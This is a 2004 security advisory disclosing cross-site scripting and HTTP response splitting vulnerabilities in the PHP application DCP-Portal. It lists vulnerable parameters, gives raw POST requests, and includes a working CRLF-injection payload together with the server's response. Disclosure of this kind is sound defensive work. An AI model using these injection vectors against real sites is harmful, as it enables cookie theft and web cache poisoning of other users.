|
Title: [Maxpatrol Security Advisory] Multiple vulnerabilities in DCP-Portal Date: 28.09.2004 Severity: Low Application: DCP-Portal, dcp-portal Platform: PHP I. DESCRIPTION -------------- Multiple vulnerabilities were found in DCP-Portal. A remote user can conduct cross-site scripting attacks and HTTP response splitting attacks.1. XSS in GET /calendar.php?year=[XSS code here]&month=09&day=01 /calendar.php?year=2004&month=[XSS code here]&day=01 /calendar.php?year=2004&month=09&day=[XSS code here] /index.php?page=annoucements&cid=[XSS code here] /annoucement.php?aid=8&cid=[XSS code here] /news.php?nid=34&cid=[XSS code here] /contents.php?cid=[XSS code here] /index.php?cid=[XSS code here] 2. XSS in post POST /index.php?page=send_write HTTP/1.1 Host: dcp-portal Content-Type: application/x-www-form-urlencoded Content-Length: 91 PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS code here] POST /search.php HTTP/1.1 Host: dcp-portal Content-Type: application/x-www-form-urlencoded Content-Length: 59 PHPSESSID=1&q=XSS code here]&fields=1 POST /register.php HTTP/1.1 Host: dcp-portal Content-Type: application/x-www-form-urlencoded Content-Length: 137 PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=scanner@ptsecurity.com&ad dres s=1&zip=1&city=1&country=[XSS code here] 3. HTTP response splitting POST /calendar.php?show=full_month HTTP/1.1 Host: dcp-portal Content-Type: application/x-www-form-urlencoded Content-Length: 200 PHPSESSID=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a Cont ent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eSca nned %20by%20PTsecurity%3c/html%3e%0d%0a&s=1&submit=1 Result <...> (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a X-Powered-By: PHP/4.3.8 Set-Cookie: PHPSESSID= Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 34 Scanned by PTsecurity ; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Transfer-Encoding: chunked Content-Type: text/html <...> II. IMPACT ---------- A remote user can access the target user's cookies (including authentication cookies). A remote user may be able to poison any intermediate web caches with arbitrary content. III. SOLUTION ------------- Not available currently. IV. VENDOR FIX/RESPONSE ----------------------- n/a V. CREDIT ------------- This vulnerability was discovered by Positive Technologies using MaxPatrol (www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet. MaxPatrol's intelligent algorithms are also capable to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting).